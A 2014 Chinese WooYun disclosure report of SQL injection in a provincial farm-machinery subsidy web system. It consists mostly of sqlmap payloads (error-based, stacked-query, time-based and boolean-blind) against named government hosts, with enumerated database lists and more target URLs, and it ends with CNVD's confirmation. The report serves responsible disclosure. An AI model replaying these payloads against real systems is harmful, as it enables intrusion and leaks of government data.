某建站系统存在通用型sql注入

漏洞详情

披露状态:

2014-01-06: 细节已通知厂商并且等待厂商处理中
2014-01-11: 厂商已经确认,细节仅向厂商公开
2014-01-14: 细节向第三方安全合作伙伴开放
2014-01-21: 细节向核心白帽子及相关领域专家公开
2014-01-31: 细节向普通白帽子公开
2014-02-20: 细节向实习白帽子公开
2014-04-06: 细节向公众公开

简要描述:

继http://wooyun.org/bugs/wooyun-2014-047782,提交的云南省农机购置补贴信息管理系统存在post sql注入的后续检测,发现全国多个省份采用同一套网站系统,经过渗透检测均发现存在通用性sql注入。google随机采集了http://218.94.30.9/2013njbt/Application/QiYeTuiJjxs.aspx(江苏省)
http://116.52.13.46//ynnj2012/Application/QiYeTuiJjxs.aspx(云南省)
http://amic.jxagri.gov.cn/nybgj2013/Application/QiYeTuiJjxs.aspx(江西省)
http://nj2013.qgny.net/Application/QiYeTuiJjxs.aspx(湖北省)
http://www.shac-nj.com:90/njbt/Application/QiYeTuiJjxs.aspx(上海)

这只是部分网址,当然其中有些站点把该漏洞修补了。

详细说明:

对http://218.94.30.9/2013njbt/Application/QiYeTuiJjxs.aspx(江苏省)的验证:



Place: POST

Parameter: TextBox1

Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

Payload: __VIEWSTATE=/wEPDwUKLTExMzcyNTQ1MQ9kFgICAw9kFgoCAw8PZBYCHgVzdHlsZQUOZGlzcGxheTpibG9jaztkAgYPD2QWAh8ABQ1kaXNwbGF5Om5vbmU7ZAIJDw9kFgIfAAUNZGlzcGxheTpub25lO2QCDw88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCAWQWAmYPZBYGAgEPZBYOZg8PFgIeBFRleHQFBiZuYnNwO2RkAgEPDxYCHwMFBiZuYnNwO2RkAgIPDxYCHwMFBiZuYnNwO2RkAgMPDxYCHwMFBiZuYnNwO2RkAgQPDxYCHwMFBiZuYnNwO2RkAgUPDxYCHwMFBiZuYnNwO2RkAgYPDxYCHwMFBiZuYnNwO2RkAgIPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHwRoZBYCZg9kFgICAQ8WAh8EaBYOAgEPDxYCHgdFbmFibGVkaGRkAgMPDxYCHwVoZGQCBQ8PFgIfAwUBMWRkAgcPDxYCHwMFATFkZAIJDw8WAh8FaGRkAgsPDxYCHwVoZGQCDQ8PFgIfAwUBMWRkAhEPDxYCHwRnZGQYAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFBHNjcXkFBGZkbWMFBGpqeGgFDnFpeWV0dWlqanhzX2d2DzwrAAoBCAIBZPcDkg/8N/dI0q2fmX4/To3Gbnlo&scqy=on&TextBox1=%%' AND 9682=CONVERT(INT,(SELECT CHAR(113)+CHAR(116)+CHAR(99)+CHAR(97)+CHAR(113)+(SELECT (CASE WHEN (9682=9682) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(115)+CHAR(115)+CHAR(114)+CHAR(113))) AND '%'='&TextBox2=&TextBox3=&btnChaXun=%E6%9F%A5%E8%AF%A2&sqlvlaue=



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: __VIEWSTATE=/wEPDwUKLTExMzcyNTQ1MQ9kFgICAw9kFgoCAw8PZBYCHgVzdHlsZQUOZGlzcGxheTpibG9jaztkAgYPD2QWAh8ABQ1kaXNwbGF5Om5vbmU7ZAIJDw9kFgIfAAUNZGlzcGxheTpub25lO2QCDw88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCAWQWAmYPZBYGAgEPZBYOZg8PFgIeBFRleHQFBiZuYnNwO2RkAgEPDxYCHwMFBiZuYnNwO2RkAgIPDxYCHwMFBiZuYnNwO2RkAgMPDxYCHwMFBiZuYnNwO2RkAgQPDxYCHwMFBiZuYnNwO2RkAgUPDxYCHwMFBiZuYnNwO2RkAgYPDxYCHwMFBiZuYnNwO2RkAgIPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHwRoZBYCZg9kFgICAQ8WAh8EaBYOAgEPDxYCHgdFbmFibGVkaGRkAgMPDxYCHwVoZGQCBQ8PFgIfAwUBMWRkAgcPDxYCHwMFATFkZAIJDw8WAh8FaGRkAgsPDxYCHwVoZGQCDQ8PFgIfAwUBMWRkAhEPDxYCHwRnZGQYAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFBHNjcXkFBGZkbWMFBGpqeGgFDnFpeWV0dWlqanhzX2d2DzwrAAoBCAIBZPcDkg/8N/dI0q2fmX4/To3Gbnlo&scqy=on&TextBox1=%%'; WAITFOR DELAY '0:0:5'--&TextBox2=&TextBox3=&btnChaXun=%E6%9F%A5%E8%AF%A2&sqlvlaue=



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: __VIEWSTATE=/wEPDwUKLTExMzcyNTQ1MQ9kFgICAw9kFgoCAw8PZBYCHgVzdHlsZQUOZGlzcGxheTpibG9jaztkAgYPD2QWAh8ABQ1kaXNwbGF5Om5vbmU7ZAIJDw9kFgIfAAUNZGlzcGxheTpub25lO2QCDw88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCAWQWAmYPZBYGAgEPZBYOZg8PFgIeBFRleHQFBiZuYnNwO2RkAgEPDxYCHwMFBiZuYnNwO2RkAgIPDxYCHwMFBiZuYnNwO2RkAgMPDxYCHwMFBiZuYnNwO2RkAgQPDxYCHwMFBiZuYnNwO2RkAgUPDxYCHwMFBiZuYnNwO2RkAgYPDxYCHwMFBiZuYnNwO2RkAgIPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHwRoZBYCZg9kFgICAQ8WAh8EaBYOAgEPDxYCHgdFbmFibGVkaGRkAgMPDxYCHwVoZGQCBQ8PFgIfAwUBMWRkAgcPDxYCHwMFATFkZAIJDw8WAh8FaGRkAgsPDxYCHwVoZGQCDQ8PFgIfAwUBMWRkAhEPDxYCHwRnZGQYAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFBHNjcXkFBGZkbWMFBGpqeGgFDnFpeWV0dWlqanhzX2d2DzwrAAoBCAIBZPcDkg/8N/dI0q2fmX4/To3Gbnlo&scqy=on&TextBox1=%%' WAITFOR DELAY '0:0:5'--&TextBox2=&TextBox3=&btnChaXun=%E6%9F%A5%E8%AF%A2&sqlvlaue=



available databases [9]:

[*] master

[*] model

[*] msdb

[*] njbt2012

[*] njbt2012_0225

[*] njbt2013test

[*] njgzbt

[*] njgzbt2013

[*] tempdb



=======================================================================

对http://116.52.13.46//ynnj2012/Application/QiYeTuiJjxs.aspx(云南省):



Place: POST



Parameter: TextBox1



Type: boolean-based blind



Title: AND boolean-based blind - WHERE or HAVING clause



Payload: __VIEWSTATE=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&scqy=on&TextBox1=%%' AND 8732=8732 AND '%'='&TextBox2=&TextBox3=&btnChaXun=%E6%9F%A5%E8%AF%A2&sqlvlaue=







Type: error-based



Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause



Payload: __VIEWSTATE=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&scqy=on&TextBox1=%%' AND 4801=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4801=4801) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(105)+CHAR(113)+CHAR(113))) AND '%'='&TextBox2=&TextBox3=&btnChaXun=%E6%9F%A5%E8%AF%A2&sqlvlaue=







Type: AND/OR time-based blind



Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)



Payload: __VIEWSTATE=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&scqy=on&TextBox1=%%' AND 4052=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='&TextBox2=&TextBox3=&btnChaXun=%E6%9F%A5%E8%AF%A2&sqlvlaue=





available databases [12]:



[*] 13bt



[*] master



[*] model



[*] msdb



[*] njbt2012



[*] njgzbt



[*] njgzbt2013



[*] njgzbt2013test



[*] ReportServer



[*] ReportServerTempDB



[*] sheng_2009



[*] tempdb

漏洞证明:

同上



虽然这次只有验证了2个省份的,但是全国大部分省份都采用了该web系统。



希望开发商重视该注入造成的重要信息泄漏和更严重的危害。



以下是采集的是部分省份的管理系统:



nongj.shac.gov.cn/dwhnjsy.asp



mulu.tjnj.gov.cn/dwhnjsy.asp



220.171.42.161/xjnj/dwhnjsy.asp



218.12.43.242/dwhnjsy.asp



116.52.13.46/dwhnjsy.asp



nj.qgny.net/dwhnjsy.asp

修复方案:

修改代码

版权声明:转载请注明来源 【|→上善若水】@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-01-11 17:36

厂商回复:

CNVD确认并在2个省份实例上复现所述情况,已经转由CNVD直接通报软件生产厂商。如果后续白帽子测试有其他实例,也可以再次提交。

最新状态:

暂无


漏洞评价: